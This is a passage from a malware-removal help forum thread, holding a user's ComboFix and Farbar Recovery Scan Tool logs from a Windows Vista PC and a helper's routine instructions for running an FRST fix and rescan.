[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedViewOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncingOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2008-01-21 202240]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2008-06-19 6244896]
"GrooveMonitor"="c:\program files\Microsoft Office\Office12\GrooveMonitor.exe" [2008-10-25 31072]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG2012\avgtray.exe" [2012-11-20 2598520]
"V0415Mon.exe"="c:\windows\V0415Mon.exe" [2008-08-07 28672]
"Nikon Message Center 2"="c:\program files\Nikon\Nikon Message Center 2\NkMC2.exe" [2011-10-30 571392]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"AvgUninstallURL"="start http://www.avg.com/ww.special-uninstallation-feedback-app?lic=&inst=NwA3AC0ANAAxADMANAA1ADgANwAwADIALQBGAFAAOQArADYALQBCAEEAUgA5AEcAKwAxAC0AVABCADkAKwAyAC0ARgBMACsAOQAtAFgATwAzADYAKwAxAC0ARgA5AE0ANwBDACsANQAtAEYAOQBNADEAMABCACsAMQA&prod=0&ver=9.0.894" [?]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Exif Launcher S.lnk - c:\program files\FinePixViewerS\QuickDCF2.exe [2009-4-9 303104]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    autocheck autochk *\0c:\progra~1\AVG\AVG2012\avgrsx.exe /sync /restart
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
backup=c:\windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^MikeandBert^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\MikeandBert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2012-01-03 07:37 843712 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 04:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DivXUpdate]
2011-03-21 18:56 1230704 ----a-w- c:\program files\DivX\DivX Update\DivXUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2011-10-10 01:06 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2012-04-19 03:56 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation REG_MULTI_SZ    FontCache
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-07-18 14:19 1104200 ----a-w- c:\program files\Google\Chrome\Application\36.0.1985.125\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-20 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-06-14 18:28]
.
2014-07-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-11-16 09:59]
.
2014-07-20 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-11-16 09:59]
.
.
------- Supplementary Scan -------
.
uStart Page = https://www.google.com/
mStart Page = hxxp://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
uSearchURL,(Default) = hxxp://www.google.com/search/?q=%s
IE: Sothink SWF Catcher - c:\program files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
LSP: %SYSTEMROOT%\system32\nvLsp.dll
TCP: DhcpNameServer = 192.168.1.1
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} - file:///F:/win/setup/iamce.dll
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} - hxxp://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
FF - ProfilePath - c:\users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default\
FF - prefs.js: keyword.URL - hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
.
- - - - ORPHANS REMOVED - - - -
.
URLSearchHooks-{32b29df0-2237-4370-9a29-37cebb730e9b} - (no file)
URLSearchHooks-{b2bf7b3f-bf0b-4c48-aec6-f92c51be63e1} - (no file)
WebBrowser-{32B29DF0-2237-4370-9A29-37CEBB730E9B} - (no file)
HKCU-Run-ROC_ROC_APR2013_AV - c:\users\MikeandBert\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe
HKCU-Run-AVG-Secure-Search-Update_0913a - c:\users\MikeandBert\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe
HKLM-Run-eRecoveryService - (no file)
SafeBoot-08317434.sys
SafeBoot-59176720.sys
SafeBoot-WudfPf
SafeBoot-WudfRd
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2446708 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2478663 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2518870 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2539636 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2572078 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
.
.
.
**************************************************************************
scanning hidden processes ... 
.
scanning hidden autostart entries ...
.
scanning hidden files ... 
.
scan completed successfully
hidden files:
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-34897099)
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2014-07-20  15:24:05
ComboFix-quarantined-files.txt  2014-07-20 22:24
.
Pre-Run: 14,777,839,616 bytes free
Post-Run: 18,161,680,384 bytes free
.
- - End Of File - - F40078A2C2CF7E3A053E02257C416BD4
8C9F9E03865C35F0F3829A23CDA42F5D
 



#6 aharonov

  • Malware Response Team

Posted 21 July 2014 - 01:53 AM

Ok. Please make sure again that those zombified instances of dllhost.exe are not running and then run the fix from step 1. How is the situation after the reboot?


Step 1

Please download the attached file fixlist.txt (1.14KB) and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button. Allow the reboot.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.

Edited by aharonov, 21 July 2014 - 01:54 AM.


#7 mcgrotty

  • Topic Starter

Posted 21 July 2014 - 04:54 PM

That was a significant improvement! Went 5 hours without another instance opening. Thank you.

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:20-07-2014
Ran by MikeandBert (administrator) on HOME-PC on 21-07-2014 08:06:58
Running from C:\Users\MikeandBert\Desktop\com fix
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgcsrvx.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Agere Systems) C:\Windows\System32\agrsmsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgwdsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgnsx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgtray.exe
(Creative Technology Ltd.) C:\Windows\V0415Mon.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(FUJIFILM Corporation) C:\Program Files\FinePixViewerS\QuickDCF2.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe

==================== Registry (Whitelisted) ==================

HKLM\...\RunOnce: [AvgUninstallURL] => cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-app?lic="&"inst=NwA3AC0ANAAxA (the data entry has 174 more characters).
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1003\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Exif Launcher S.lnk
ShortcutTarget: Exif Launcher S.lnk -> C:\Program Files\FinePixViewerS\QuickDCF2.exe (FUJIFILM Corporation)
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2012\avgrsx.exe /sync /restart

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
SearchScopes: HKLM - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKLM - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: AVG Do Not Track -> {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} -> C:\Program Files\AVG\AVG2012\avgdtiex.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX HiQ -> {593DDEC6-7468-4cdd-90E1-42DADAA222E9} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKCU - No Name - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} -  No File
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} file:///F:/win/setup/iamce.dll
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} http://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll (AVG Technologies CZ, s.r.o.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog9 01 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 02 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 03 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 14 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default
FF Keyword.URL: hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @checkpoint.com/FFApi - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @Google.com/GoogleEarthPlugin - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @nvidia.com/3DVision - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin: @nvidia.com/3DVisionStreaming - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @zoom.us/ZoomVideoPlugin - C:\Users\MikeandBert\AppData\Roaming\Zoom\bin\npzoomplugin.dll (Zoom Video Communications, Inc.)
FF Extension: Lavasoft Search Plugin - C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default\Extensions\jid1-yZwVFzbsyfMrqQ@jetpack [2012-12-02]
FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video
FF Extension: DivX Plus Web Player HTML5 <video> - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video [2011-05-06]
FF HKLM\...\Firefox\Extensions: [{6904342A-8307-11DF-A508-4AE2DFD72085}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa
FF Extension: DivX HiQ - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa [2011-05-06]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG2012\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG2012\Firefox4 [2011-12-03]
FF HKLM\...\Firefox\Extensions: [{F53C93F1-07D5-430c-86D4-C9531B27DFAF}] - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack
FF Extension: AVG Do Not Track - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack [2012-05-15]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2013-12-23]

Chrome:
=======
CHR HomePage:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\pdf.dll No File
CHR Plugin: (AVG Internet Security) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla\12.0.0.2210_0\plugins/avgnpss.dll (AVG Technologies CZ, s.r.o.)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Java Deployment Toolkit 6.0.260.3) - C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java™ Platform SE 6 U26) - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (npFFApi) - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (DivX Web Player) - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
CHR Plugin: (Google Earth Plugin) - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.124\npGoogleUpdate3.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Unity Player) - C:\Users\MikeandBert\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll No File
CHR Plugin: (Windows Presentation Foundation) - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_110.dll No File
CHR Extension: (Google Drive) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-27]
CHR Extension: (YouTube) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-27]
CHR Extension: (Google Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-27]
CHR Extension: (DivX HiQ) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjbmmemklcjgepojigaapkoodmkgbae [2012-12-27]
CHR Extension: (AVG Safe Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla [2012-12-27]
CHR Extension: (FBPHOTOZOOM) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpieaakhacmfleokhjcjnpcnmnmpfkid [2012-12-27]
CHR Extension: (AVG Do Not Track) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2012-12-27]
CHR Extension: (DivX Plus Web Player HTML5 video) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2012-12-27]
CHR Extension: (Gmail) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-27]
